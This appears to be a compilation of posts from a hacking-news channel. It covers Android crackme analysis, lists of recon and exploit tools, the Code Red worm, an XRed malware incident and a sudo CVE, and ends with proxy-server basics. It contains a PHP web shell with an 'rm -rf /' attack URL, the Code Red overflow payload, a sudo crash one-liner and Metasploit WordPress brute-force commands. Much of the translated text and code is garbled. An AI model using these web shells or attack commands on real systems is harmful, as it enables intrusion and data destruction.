▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ NEWS ▄ ▂ ▁


1) We Start Using Pinterest
pinterest.com/UndercOdeOfficial


2) After 3 ban at github.com we decide to get another pro github account :
github.com/UndercOdeOfficial


🦑 Some Follow From you will appreciate it 😊
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ NEWS ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Android Hacking- Simple algorithm analysis
t.me/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

New to Android dynamic debugging, and decided to use

1) First of all, without anti-debugging, he would not pretend to be cut off) Run the apk, enter the verification code, and pop up


2) Then use JEB to analyze the apk file to find the character string "Sorry, Fish!", Find the verification process, and find the verification function EatRice

3) So in libxy.so, find the function as follows. The dynamic debugging finds that the program first determines whether the first character of the input string is 'X' (0x58), whether the second character is '#' (0x23), and whether the string length Is 7, if these conditions are not met then wait 3s and then return 0. From this, it is judged that the verification code format should be: "X # -----", where "-" represents a temporarily unknown character. It is assumed here that the name of the string is szA.

4) The debugger finds that the program will calculate szA [1: 2], szA [2: 3], szA [3: 4], szA [4: 5], szA [5: 6] respectively and perform the calculation with the corresponding results. By comparison, if the results are correct, it is considered successful.

5) pecific algorithm is not described. Let ’s look at the program. Let ’s talk about the cracking process. Since the algorithm involves some shifts and feedback, it is difficult to push backwards (personally think) However, in the algorithm, the operation is performed once every two bits and each bit is a visible character (0x21 ~ 0x7e). Therefore, the idea here is to
explode bit by bit. In this example, when calculating szA [1: 2], szA [1] = '#' is known. Then szA [2] can be blasted,
and szA [2] is known during the calculation of szA [2: 3], szA [3]
can be blasted , and so on, the value of each bit can be blasted ,
And the calculation time complexity should also be O (1), that is, a maximum of (0x7e-0x21) * 5 = 0x1d1 operations to calculate the answer

🦑 will send later other parts
Written by UnderCode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑TOPIC HACKERS SCRIPTS - KALI -TERMUX at GITHUB
Twitter.com/UndercOdeTC

🦑 Active Intelligence Gathering

1) EyeWitness is designed to take screenshots of websites, provide some server header info, and identify default credentials if possible. https://github.com/ChrisTruncer/EyeWitness

2) AWSBucketDump is a tool to quickly enumerate AWS S3 buckets to look for loot. https://github.com/jordanpotti/AWSBucketDump

3) AQUATONE is a set of tools for performing reconnaissance on domain names. https://github.com/michenriksen/aquatone

4) spoofcheck a program that checks if a domain can be spoofed from. The program checks SPF and DMARC records for weak configurations that allow spoofing. https://github.com/BishopFox/spoofcheck

5) Nmap is used to discover hosts and services on a computer network, thus building a "map" of the network. https://github.com/nmap/nmap
dnsrecon a tool DNS Enumeration Script. https://github.com/darkoperator/dnsrecon

6) dirsearch is a simple command line tool designed to brute force directories and files in websites. https://github.com/maurosoria/dirsearch

7) Sn1per automated pentest recon scanner. https://github.com/1N3/Sn1per

8) Social Mapper OSINT Social Media Mapping Tool, takes a list of names & images (or LinkedIn company name) and performs automated target searching on a huge scale across multiple social media sites. Not restricted by APIs as it instruments a browser using Selenium. Outputs reports to aid in correlating targets across sites. https://github.com/

9) SpiderLabs/social_mapper
skiptracer OSINT scraping framework, utilizes some basic python webscraping (BeautifulSoup) of PII paywall sites to compile passive information on a target on a ramen noodle budget. https://github.com/xillwillx/skiptracer

10) FOCA (Fingerprinting Organizations with Collected Archives) is a tool used mainly to find metadata and hidden information in the documents its scans. https://github.com/ElevenPaths/FOCA

11) theHarvester is a tool for gathering subdomain names, e-mail addresses, virtual hosts, open ports/ banners, and employee names from different public sources. https://github.com/laramies/theHarvester

12) Metagoofil is a tool for extracting metadata of public documents (pdf,doc,xls,ppt,etc) availables in the target websites. https://github.com/laramies/metagoofil

E N J O Y
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Dangerous Virus Code Red (computer worm)
> server attack
t.me/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Code Red was a computer worm observed on the Internet on July 15, 2001. It attacked computers running Microsoft's IIS web server.

2) The Code Red worm was first discovered and researched by eEye Digital Security employees Marc Maiffret and Ryan Permeh when it exploited a vulnerability discovered by Riley Hassell. They named it "Code Red" because Code Red Mountain Dew was what they were drinking at the time.

🦑 Exploited vulnerability

3) The worm showed a vulnerability in the growing software distributed with IIS, described in Microsoft Security Bulletin MS01-033,[3] for which a patch had been available a month earlier.

4) The worm spread itself using a common type of vulnerability known as a buffer overflow. It did this by using a long string of the repeated letter 'N' to overflow a buffer, allowing the worm to execute arbitrary code and infect the machine with the worm. Kenneth D. Eichman was the first to discover how to block it, and was invited to the White House for his discovery.

🦑Worm payload:

5) The payload of the worm included:

> Defacing the affected web site to display:
HELLO! Welcome to http://www.worm.com! Hacked By xy

6) Other activities based on day of the month:

> Days 1-19: Trying to spread itself by looking for more IIS servers on the Internet.

> Days 20–27: Launch denial of service attacks on several fixed IP addresses. The IP address of the White House web server was among those.[2]

> Days 28-end of month: Sleeps, no active attacks.

7) When scanning for vulnerable machines, the worm did not test to see if the server running on a remote machine was running a vulnerable version of IIS, or even to see if it was running IIS at all. Apache access logs from this time frequently had entries such as these:

GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNN
%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801
%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3
%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0
The worm's payload is the string following the last 'N'. Due to a buffer overflow, a vulnerable host interpreted this string as computer instructions, propagating the worm.

powred by wiki
Posted On UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 2020 news from twitter.com/UndercOdeTC
> XRed virus attack on a company's (special in europ) remote office during the holiday season

1) Tencent Enterprise Security Emergency Response Center (hereinafter referred to as Tencent Security) received a request from an Internet company.
> A remote business tool and spreadsheet file shared by an internal business group of the company's internal work group was found to be infected with a virus, causing more than 200 employees' computers in the department. Being infected, the company was concerned that the security of the system's business was threatened.

🦑Troubleshoot the source of virus infection:

1) The company's early internal investigation: The company's network administrator noticed that the exe file of the remote office tool in the compressed package shared by an employee through the internal working group was infected, and the remote office tool exe provided by the company was a normal file. Therefore, the source of virus transmission is basically confirmed.

2) Tencent security engineer conducted a remote investigation on this and found that the computer suspected of being infected has the following phenomena:

a) Unzip the file on this computer and find that the uncompressed exe file is larger than the original file and has been infected.

b)Copy any exe file to the desktop and the exe file will be infected. After the infection, the file description is modified into a touchpad device driver. Based on this, it can be basically confirmed that the virus is the "Synaptics" worm that has been disclosed by peers.

c) Continued inspections revealed that the cracked version of the compression software on this poisoned computer did not find any “supply chain pollution” issues. Basically, it can be confirmed that this personal computer was infected with XRed virus some time ago earlier. In this emergency, it was used as a work computer for remote office use. When sharing files externally, it was monitored by the company's IT staff and found abnormal.

@UndercOdeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Third, block virus transmission and repair programs :
(special X-Red Virus )
t.me/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) The company's IT staff immediately disconnected the infected machine from the network to prevent further spread.

2) After confirming that the computer housekeeper Cloud Master Defense can intercept the pathogen "Synaptics.exe", it immediately requested that computers without "Tencent T-sec Terminal Security Management System" be installed to install Tencent Computer Housekeeper.

3) The pathogen "Synaptics.exe" has more than 20,000 variants. The latest update was January 2020.

4) It is still active and it is recommended that companies upgrade anti-virus software in time to take precautions.

5) For infected computers, use Tencent Computer Manager (or Tencent T-sec Terminal Security Management System) to conduct a comprehensive check and repair of infected files. The XRed virus infection method is relatively special (for details, please refer to the "Detailed Analysis of Samples" section below). Tencent Computer Butler can accurately identify and repair it perfectly and restore the infected file to its original state.

@UndercOdeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 everyOne should take care from X-RED MALWARE, HIS ACTIVITY STARTED SINCE JAN 2020

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2020 Vulnerabilty from twitter.com/UndercOdeTC
> Sudo vulnerability allows unprivileged Linux and macOS users to run commands as root

🦑 cyber-security-3400657_640
Sudo vulnerability allows unprivileged Linux and macOS users to run commands as root
Author: @UndercOdeOfficialn Date: 2020-02-04 Category: security alerts , vulnerability events


> Apple security expert Joe Vennix has discovered a vulnerability (CVE-2019-18634) that allows unprivileged Linux and macOS users to run commands as root.

> This vulnerability can only be exploited in special configurations.

> The vulnerability can only be exploited if the "pwfeedback" option has been enabled in the sudo configuration file. The pwfeedback option for root allows visual feedback when the user enters a password.

> Experts point out that this vulnerability can be triggered even if the user is not in the user file.

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) "You do not need root privileges to trigger this vulnerability, you just need to enable pwfeedback." Sudo developer Todd C. Miller wrote.

2) "When entering the password, you can enter sudo through the pipe to reproduce it. For example:"

$ perl -e 'print (("A" x 100. "\ x {00}") x 50)' | sudo -S id
Password: Segmentation fault
There are two reasons for this vulnerability:

3) The pwfeedback option is generally not ignored when reading from devices other than the terminal device. Due to the lack of a terminal, the version of the line erase character is always an initial value of 0.
If there is a write error, the code that erases the asterisk line will not reset the buffer position correctly, but it will reset the remaining buffer length. This will cause the getln () function to be written outside the buffer. "

4) If this option is enabled, you can change "Defaults pwfeedback" to "Defaults! Pwfeedback" in the user profile.

5) The sudo maintainer released version 1.8.31 of root.

"Although there are logic errors in the 1.8.26 to 1.8.30 versions of sudo, the vulnerabilities could not be exploited due to changes in EOF processing after 1.8.26." Miller explained.

6) In October 2019, Vennix discovered a Sudo bypass issue. Even if "sudo user configuration" does not allow root access, a malicious user or malicious program can still execute arbitrary commands as the root user on the target Linux system, and this big is patched on undercode os today/and in debian yesterday

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑TOP EXTREMLY DAGEROUS HACKING TOOLS/ accounts-cards-modding... TERMUX-KALI-PARROT...

> EXPLOITE TOOLS 2019-2020
t.me/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) WinRAR Remote Code Execution Proof of Concept exploit for CVE-2018-20250. https://github.com/WyAtu/CVE-2018-20250

2) Composite Moniker Proof of Concept exploit for CVE-2017-8570. https://github.com/rxwx/CVE-2017-8570

3) Exploit toolkit CVE-2017-8759 is a handy python script which provides pentesters and security researchers a quick and effective way to test

4) Microsoft .NET Framework RCE. https://github.com/bhdresh/CVE-2017-8759
CVE-2017-11882 Exploit accepts over 17k bytes long command/code in maximum. https://github.com/unamer/CVE-2017-11882

5) Adobe Flash Exploit CVE-2018-4878. https://github.com/anbai-inc/CVE-2018-4878

6) Exploit toolkit CVE-2017-0199 is a handy python script which provides pentesters and security researchers a quick and effective way to test

7) Microsoft Office RCE. https://github.com/bhdresh/CVE-2017-0199
demiguise is a HTA encryption tool for RedTeams. https://github.com/nccgroup/demiguise

8) Office-DDE-Payloads collection of scripts and templates to generate Office documents embedded with the DDE, macro-less command execution technique. https://github.com/0xdeadbeefJERKY/Office-DDE-Payloads

9) CACTUSTORCH Payload Generation for Adversary Simulations. https://github.com/mdsecactivebreach/CACTUSTORCH

10) SharpShooter is a payload creation framework for the retrieval and execution of arbitrary CSharp source code. https://github.com/mdsecactivebreach/SharpShooter

11) Don't kill my cat is a tool that generates obfuscated shellcode that is stored inside of polyglot images. The image is 100% valid and also 100% valid shellcode. https://github.com/Mr-Un1k0d3r/DKMC

12) Malicious Macro Generator Utility Simple utility design to generate obfuscated macro that also include a AV / Sandboxes escape
mechanism. https://github.com/Mr-Un1k0d3r/

13) MaliciousMacroGenerator
SCT Obfuscator Cobalt Strike SCT payload obfuscator. https://github.com/Mr-Un1k0d3r/SCT-obfuscator
@UndercOdeTesting
14) Invoke-Obfuscation PowerShell Obfuscator. https://github.com/danielbohannon/Invoke-Obfuscation

15) Invoke-CradleCrafter PowerShell remote download cradle generator and obfuscator. https://github.com/danielbohannon/Invoke-CradleCrafter

16) Invoke-DOSfuscation cmd.exe Command Obfuscation Generator & Detection Test Harness. https://github.com/danielbohannon/Invoke-DOSfuscation

17) morphHTA Morphing Cobalt Strike's evil.HTA. https://github.com/vysec/morphHTA
Unicorn is a simple tool for using a PowerShell downgrade attack and

18) inject shellcode straight into memory. https://github.com/trustedsec/unicorn

U S E FOR Learning Only !!!!
@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Hacking an Ubuntu Linux System with PHP :
instagram.com/UnderCodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

> In this practical scenario, we will provide you with basic information on how to use PHP to disrupt Linux.
> We will not target any victims. If you want to try it out, you can install LAMPP on your local computer.

1) PHP comes with two functions that can be used to execute Linux commands. It has exec () and shell_exec () functions. The function exec () returns the last line of command output, while shell_exec () returns the entire result of the command as a string.

2) For demonstration purposes, let us assume that the attacker administrator uploads the following files on a web server.

<? PHP $ cmd = isset ($ _ GET ['cmd'])? $ _GET ['cmd']: 'ls -l'; echo "execute a shell command:-> $ cmd </ br>"; $ output = shell_exec ($ cmd); echo "
<pre> $ output </ pre> ";? > Here above script gets commands from the GET variable named cmd in. The command is executed using shell_exec () and returns the result in the browser. You can use the above code HTTP using the following URL : //localhost/cp/konsole.php CMD = LS% 20 liters


3) "... konsole.php? Cmd = ls% 20-l" assigns the value ls -l to the variable cmd .
The command executed against the server will be

4) See That Picture By UndercODE

> The above command only shows the files and permissions in the current directory.
Assuming the attacker passes the command

rm -rf /
here,
"Rm" delete file
"Rf" causes the rm command to run in recursive mode. Delete all folders and files
"/" Instructs the command to start deleting files from the root directory
The attack URL looks like this
HTTP: //localhost/cp/konsole.php CMD = RM% 20-RF% 20 /

written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Web Hacking/ Wordpress- Brute force attack using metasploit
fb.com/UndercOdeTestingCompany

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) This module will test WordPress logins on a series of computers and report successful logins.

2) If you have loaded the database plugin and connected to the database of this module, it will log successful logins and hosts so you can track your visits.
msf>useauxiliary/scanner/http/wordpress_login_enummsfauxiliary(wordpress_login_enum)>setrhosts192.168.1.4msfauxiliary(wordpress_login_enum)>setrport80msfauxiliary(wordpress_login_enum)>setuser_file/root/


> Desktop / user . Txt
msf auxiliary ( wordpress_login_enum ) > set pass_file / root / Desktop / pass . Txt msf auxiliary ( wordpress_login_enum ) > exploit WordPress brute force successful login user: bitnami as the username and password.

written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 What is a proxy server
twitter.com/UndercOdeTC

in the TCP / IP network, the traditional communication process is this:

1) the client requests data to the server, the server response Data should be transmitted to the client upon request.

2) After the introduction of the proxy server, the process becomes like this: the client initiates a request to the server, and the request is sent to the proxy server; the proxy server analyzes the request, and first checks whether there is request data in its cache, and directly Transfer to the client, if not, make a request to the server on behalf of the client.

3) After the server responds, the proxy server transmits the response data to the client, while keeping a copy of the data in its own cache. In this way, when another client requests the same data, the proxy server can directly transmit the data to the client without having to initiate a request to the server.

written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Features Of Proxy Server :
instagram.com/UndercOdeTestingCompany

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

> Generally speaking, the proxy server has the following features:

1) increase access speed by caching

> With the rapid development of Internet, network bandwidth is becoming increasingly rare. Therefore, in order to improve the access speed, many ISPs provide proxy servers, which use the cache function of the proxy server to speed up the network access speed. Generally speaking, most proxy servers support HTTP caching, but some proxy servers also support FTP caching. When choosing a proxy server, for most organizations, only HTTP caching is sufficient.
Generally, caches are classified as active caches and passive caches. The so-called passive cache means that the proxy server caches the data returned by the server only when the client requests data. If the data expires and the client requests the same data, the proxy server must re-initiate a new data request. When the response data is transmitted to the client, a new cache is performed. The so-called active cache means that the proxy server continuously checks the data in the cache. Once the data expires, the proxy server actively initiates a new data request to update the data. In this way, when a client requests the data, the response time is greatly reduced. It should also be noted that most proxy servers do not cache the authentication information in the data.

2) Provide a method for accessing the Internet with a private IP.
IP addresses are valuable resources that are not renewable. If you have only limited IP addresses but need to provide Internet access for the entire organization, then you can achieve this by using a proxy server.

3) To improve network security
This is very clear, if all internal users to access the Internet through a proxy server, then the proxy server will become the only channel into the Internet; conversely, the proxy server is the only Internet access to internal network Channel, if you do not do reverse proxy, for the host on the Internet, only the proxy server of your entire intranet is visible, which greatly enhances the security of the network.

written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Classification and characteristics of the proxy server :
fb.com/UndercOdeTestingCompany

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

> is usually a proxy server classification is divided into circuit layer proxy application layer proxy, intelligent circuit layer proxy, etc. from the mechanism of implementation. Here, I want to start from another angle and divide proxy servers into traditional proxy servers and transparent proxy servers.

1) the biggest gain from reading this article is that I have a clear understanding of the implementation methods of intranet access to the extranet and extranet access to the intranet.

> the so-called intranet here refers to the internal network using private IP.

2) Our examples are based on the following assumptions:
your domain name is sample.com, and your intranet (192.168.1. *) Users pass proxy.sample.com (external interface eth0: 1.2.3.4; internal interface eth1: 192.168.1.1 )

3) The proxy server accesses the Internet. In other words, the proxy server is the only machine directly connected to the Internet and the intranet. It is assumed that some proxy server software (such as squid) is running on the proxy server. Assume that a client in the intranet is client.sample.com (192.168.1.100).

+ ------------------- +
| Intranet (192.168.1. *) | Eth1 + -------- + eth0 DDN
| + ---- -------- | proxy | <================> Internet
| client198.168.1.100 | + -------- +
+ --- + ----------------

eth0: 1.2.3.4
eth1: 198.168.1.1

written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂▁

🦑traditional agency example Configuration and application of proxy server
pinterest.com/UndercodeOfficial

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

🦑 based on the above we do the following:

1) The proxy service software is bound to port 8080 of the proxy server.

2) The client browser is configured to use port 8080 of the proxy server.

3) The client does not need to configure DNS.

4) A proxy server needs to be configured on the proxy server.

5) The client does not need to configure a default route.

🦑 When we open a web request in the client browser, such as " http://www.yourdomain.com ", the following events will occur successively:

1) The client uses a certain port (such as 1025) to connect to the proxy server 8080 Port, request the web page " http://www.yourdomain.com "

2) The proxy server requests "www.yourdomain.com" from the DNS to get the corresponding IP address 202.99.11.120. Then, the proxy server uses a certain port (such as 1037) to initiate a web connection request to port 80 of the IP address, requesting a web page.

3) After receiving the response web page, the proxy server transmits the data to the client.

4) The client browser displays the page.

From the perspective of www.yourdomain.com, the connection is established between port 1037 at 1.2.3.4 and port 80 at 202.99.11.120. From the client's perspective, the connection is established between port 1025 at 192.168.1.100 and port 8080 at 1.2.3.4.

written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂▁